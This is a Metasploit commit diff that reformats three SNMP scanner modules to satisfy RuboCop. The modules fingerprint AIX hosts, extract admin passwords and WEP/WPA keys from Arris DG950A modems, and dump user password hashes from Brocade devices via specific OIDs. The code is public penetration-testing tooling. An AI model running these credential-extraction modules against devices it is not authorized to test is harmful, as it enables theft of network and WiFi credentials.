Land rapid7#20243, resolving Rubocop violations in modules/auxiliary/scanner/snmp

modules/auxiliary/scanner/snmp: Resolve RuboCop violations

Author: msutovsky-r7

modules/auxiliary/scanner/snmp/aix_version.rb

@@ -3,71 +3,76 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'English'
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::SNMPClient
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner
 
   def initialize
     super(
-      'Name'        => 'AIX SNMP Scanner Auxiliary Module',
-      'Description' => 'AIX SNMP Scanner Auxiliary Module',
-      'Author'      =>
-        [
-          'Ramon de C Valle',
-          'Adriano Lima <adriano[at]risesecurity.org>',
-        ],
-      'License'     => MSF_LICENSE
+      'Name' => 'AIX SNMP Scanner',
+      'Description' => 'AIX SNMP scanner auxiliary module.',
+      'Author' => [
+        'Ramon de C Valle',
+        'Adriano Lima <adriano[at]risesecurity.org>',
+      ],
+      'License' => MSF_LICENSE,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [],
+        'Reliability' => []
+      }
     )
-
   end
 
   def run_host(ip)
-    begin
-      snmp = connect_snmp
+    snmp = connect_snmp
 
-      value = snmp.get_value('sysDescr.0')
+    value = snmp.get_value('sysDescr.0')
 
-      if value =~ /AIX/
-        value = value.split("\n")
-        description = value[0].strip
-        value = value[2].split(':')
+    unless value =~ /AIX/
+      print_error("#{ip} system is not AIX: #{value}")
+      return
+    end
 
-        value = value[1].strip
-        value = value.split('.')
+    value = value.split("\n")
+    description = value[0].strip
+    value = value[2].split(':')
 
-        value[0] = value[0].to_i
-        value[1] = value[1].to_i
-        value[2] = value[2].to_i
-        value[3] = value[3].to_i
+    value = value[1].strip
+    value = value.split('.')
 
-        version = "#{value[0]}.#{value[1]}.#{value[2]}.#{value[3]}"
+    value[0] = value[0].to_i
+    value[1] = value[1].to_i
+    value[2] = value[2].to_i
+    value[3] = value[3].to_i
 
-        report_note(
-            :host   => ip,
-            :proto => 'udp',
-            :sname  => 'snmp',
-            :port   => datastore['RPORT'],
-            :type   => 'AIX',
-            :data   => { :version => version }
-        )
+    version = "#{value[0]}.#{value[1]}.#{value[2]}.#{value[3]}"
 
-        status = "#{ip} (#{description}) is running: "
-        status << "IBM AIX Version #{value[0]}.#{value[1]}.#{value[3]} "
-        status << "(#{version})"
+    report_note(
+      host: ip,
+      proto: 'udp',
+      sname: 'snmp',
+      port: datastore['RPORT'],
+      type: 'AIX',
+      data: { version: version }
+    )
 
-        print_status(status)
-      end
+    status = "#{ip} (#{description}) is running: "
+    status << "IBM AIX Version #{value[0]}.#{value[1]}.#{value[3]} "
+    status << "(#{version})"
 
+    print_status(status)
+  rescue ::Rex::ConnectionError, ::SNMP::RequestTimeout
     # No need to make noise about timeouts
-    rescue ::Rex::ConnectionError, ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion
-    rescue ::Interrupt
-      raise $!
-    rescue Exception => e
-      print_error("#{ip} #{e.class}, #{e.message}")
-    ensure
-      disconnect_snmp
-    end
-
+  rescue ::SNMP::UnsupportedVersion => e
+    vprint_error(e.message)
+  rescue ::Interrupt
+    raise $ERROR_INFO
+  rescue StandardError => e
+    print_error("#{ip} #{e.class}, #{e.message}")
+  ensure
+    disconnect_snmp
   end
 end

modules/auxiliary/scanner/snmp/arris_dg950.rb

@@ -10,47 +10,51 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'        => 'Arris DG950A Cable Modem Wifi Enumeration',
+      'Name' => 'Arris DG950A Cable Modem Wifi Enumeration',
       'Description' => %q{
         This module will extract WEP keys and WPA preshared keys from
         Arris DG950A cable modems.
       },
-      'References'  =>
-        [
-          ['CVE','2014-4863'],
-          ['URL', 'https://www.rapid7.com/blog/post/2014/08/21/more-snmp-information-leaks-cve-2014-4862-and-cve-2014-4863/']
-        ],
-      'Author'      => ['Deral "Percent_X" Heiland'],
-      'License'     => MSF_LICENSE
+      'References' => [
+        ['CVE', '2014-4863'],
+        ['URL', 'https://www.rapid7.com/blog/post/2014/08/21/more-snmp-information-leaks-cve-2014-4862-and-cve-2014-4863/']
+      ],
+      'Author' => ['Deral "Percent_X" Heiland'],
+      'License' => MSF_LICENSE,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [],
+        'Reliability' => []
+      }
     )
   end
 
   def run_host(ip)
     snmp = connect_snmp
 
-    if snmp.get_value('sysDescr.0') =~ /DG950A/
-      print_line("#{ip}")
-
-      # System Admin Password
-      wifi_info = ''
-      password = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0')
-      print_line("Password: #{password}")
-      wifi_info << "Password: #{password}" << "\n"
-    else
-      fail_with(Failure::NoTarget, "Does not appear to be an Arris DG950A")
+    unless snmp.get_value('sysDescr.0') =~ /DG950A/
+      fail_with(Failure::NoTarget, 'Does not appear to be an Arris DG950A')
     end
 
+    print_line(ip.to_s)
+
+    # System Admin Password
+    wifi_info = ''
+    password = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0')
+    print_line("Password: #{password}")
+    wifi_info << "Password: #{password}" << "\n"
+
     # check WPA Encryption Algorithm
     encrypt_type = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.1.12')
     case encrypt_type
     when 1
-      wpa_encrypt = "TKIP"
+      wpa_encrypt = 'TKIP'
     when 2
-      wpa_encrypt = "AES"
+      wpa_encrypt = 'AES'
     when 3
-      wpa_encrypt = "TKIP/AES"
+      wpa_encrypt = 'TKIP/AES'
     else
-      wpa_encrypt = "Unknown"
+      wpa_encrypt = 'Unknown'
     end
 
     # Wifi Status
@@ -71,26 +75,26 @@ def run_host(ip)
         wep_type = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.23.1.2.12')
         case wep_type
         when 1
-          oid = "1.3.6.1.4.1.4115.1.20.1.1.3.24.1.2.12"
+          oid = '1.3.6.1.4.1.4115.1.20.1.1.3.24.1.2.12'
         when 2
-          oid = "1.3.6.1.4.1.4115.1.20.1.1.3.25.1.2.12"
+          oid = '1.3.6.1.4.1.4115.1.20.1.1.3.25.1.2.12'
         else
           print_line('FAILED')
         end
         wepkey1 = snmp.get_value("#{oid}.1")
-        key1 = "#{wepkey1}"
+        key1 = wepkey1.to_s
         print_line("WEP KEY1: #{key1}")
         wifi_info << "WEP KEY1: #{key1}" << "\n"
         wepkey2 = snmp.get_value("#{oid}.2")
-        key2 = "#{wepkey2}"
+        key2 = wepkey2.to_s
         print_line("WEP KEY2: #{key2}")
         wifi_info << "WEP KEY2: #{key2}" << "\n"
         wepkey3 = snmp.get_value("#{oid}.3")
-        key3 = "#{wepkey3}"
+        key3 = wepkey3.to_s
         print_line("WEP KEY3: #{key3}")
         wifi_info << "WEP KEY3: #{key3}" << "\n"
         wepkey4 = snmp.get_value("#{oid}.4")
-        key4 = "#{wepkey4}"
+        key4 = wepkey4.to_s
         print_line("WEP KEY4: #{key4}")
         wifi_info << "WEP KEY4: #{key4}" << "\n"
 
@@ -122,21 +126,21 @@ def run_host(ip)
         print_line('FAILED')
       end
     else
-      print_line('WIFI is not enabled')
+      print_line('WiFi is not enabled')
     end
 
     # Woot we got loot.
-    loot_name     = 'arris_wifi'
-    loot_type     = 'text/plain'
+    loot_name = 'arris_wifi'
+    loot_type = 'text/plain'
     loot_filename = 'arris_wifi.text'
-    loot_desc     = 'Arris DG950A Wifi configuration data'
+    loot_desc = 'Arris DG950A WiFi configuration data'
     p = store_loot(loot_name, loot_type, datastore['RHOST'], wifi_info, loot_filename, loot_desc)
     print_good("WiFi Data saved in: #{p}")
-  # No need to make noise
-  rescue ::SNMP::UnsupportedVersion
+  rescue ::SNMP::UnsupportedVersion => e
+    vprint_error(e.message)
   rescue ::SNMP::RequestTimeout
     raise $ERROR_INFO
-  rescue ::Exception => e
+  rescue StandardError => e
     print_error("#{ip} error: #{e.class} #{e.message}")
     disconnect_snmp
   end

modules/auxiliary/scanner/snmp/brocade_enumhash.rb

@@ -3,69 +3,82 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'English'
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::SNMPClient
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner
 
   def initialize
     super(
-      'Name'        => 'Brocade Password Hash Enumeration',
+      'Name' => 'Brocade Password Hash Enumeration',
       'Description' => %q{
         This module extracts password hashes from certain Brocade load
         balancer devices.
       },
-      'References'  =>
-        [
-          [ 'URL', 'http://web.archive.org/web/20220819052410/https://www.rapid7.com/blog/post/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string/' ]
-        ],
-      'Author'      => ['Deral "PercentX" Heiland'],
-      'License'     => MSF_LICENSE
+      'References' => [
+        [ 'URL', 'http://web.archive.org/web/20220819052410/https://www.rapid7.com/blog/post/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string/' ]
+      ],
+      'Author' => ['Deral "PercentX" Heiland'],
+      'License' => MSF_LICENSE,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [],
+        'Reliability' => []
+      }
     )
-
   end
 
   def run_host(ip)
-    begin
-      snmp = connect_snmp
-
-      if snmp.get_value('sysDescr.0') =~ /Brocade/
+    snmp = connect_snmp
 
-        @users = []
-        snmp.walk("1.3.6.1.4.1.1991.1.1.2.9.2.1.1") do |row|
-          row.each { |val| @users << val.value.to_s }
-        end
+    value = snmp.get_value('sysDescr.0')
 
-        @hashes = []
-        snmp.walk("1.3.6.1.4.1.1991.1.1.2.9.2.1.2") do |row|
-          row.each { |val| @hashes << val.value.to_s }
-        end
+    unless value =~ /Brocade/
+      print_error("#{ip} - System is not Brocade: #{value}")
+      return
+    end
 
-        print_good("#{ip} - Found user and password hashes:")
-        end
+    @users = []
+    snmp.walk('1.3.6.1.4.1.1991.1.1.2.9.2.1.1') do |row|
+      row.each { |val| @users << val.value.to_s }
+    end
 
-        credinfo = ""
-        @users.each_index do |i|
-        credinfo << "#{@users[i]}:#{@hashes[i]}" << "\n"
-        print_good("#{@users[i]}:#{@hashes[i]}")
-        end
+    @hashes = []
+    snmp.walk('1.3.6.1.4.1.1991.1.1.2.9.2.1.2') do |row|
+      row.each { |val| @hashes << val.value.to_s }
+    end
 
+    print_good("#{ip} - Found user and password hashes:")
 
-     #Woot we got loot.
-     loot_name     = "brocade.hashes"
-     loot_type     = "text/plain"
-     loot_filename = "brocade_hashes.txt"
-     loot_desc     = "Brodace username and password hashes"
-     p = store_loot(loot_name, loot_type, datastore['RHOST'], credinfo , loot_filename, loot_desc)
+    credinfo = ''
+    @users.each_index do |i|
+      credinfo << "#{@users[i]}:#{@hashes[i]}" << "\n"
+      print_good("#{@users[i]}:#{@hashes[i]}")
+    end
 
-     print_status("Credentials saved: #{p}")
-     rescue ::SNMP::UnsupportedVersion
-     rescue ::SNMP::RequestTimeout
-     rescue ::Interrupt
-       raise $!
-     rescue ::Exception => e
-       print_error("#{ip} - Error: #{e.class} #{e}")
-     disconnect_snmp
-     end
+    # Woot we got loot.
+    loot_name = 'brocade.hashes'
+    loot_type = 'text/plain'
+    loot_filename = 'brocade_hashes.txt'
+    loot_desc = 'Brocade username and password hashes'
+    p = store_loot(
+      loot_name,
+      loot_type,
+      datastore['RHOST'],
+      credinfo,
+      loot_filename,
+      loot_desc
+    )
+    print_status("Credentials saved: #{p}")
+  rescue ::SNMP::UnsupportedVersion => e
+    vprint_error("#{ip} - #{e.message}")
+  rescue ::SNMP::RequestTimeout => e
+    vprint_error("#{ip} - #{e.message}")
+  rescue ::Interrupt
+    raise $ERROR_INFO
+  rescue StandardError => e
+    print_error("#{ip} - Error: #{e.class} #{e}")
+    disconnect_snmp
   end
 end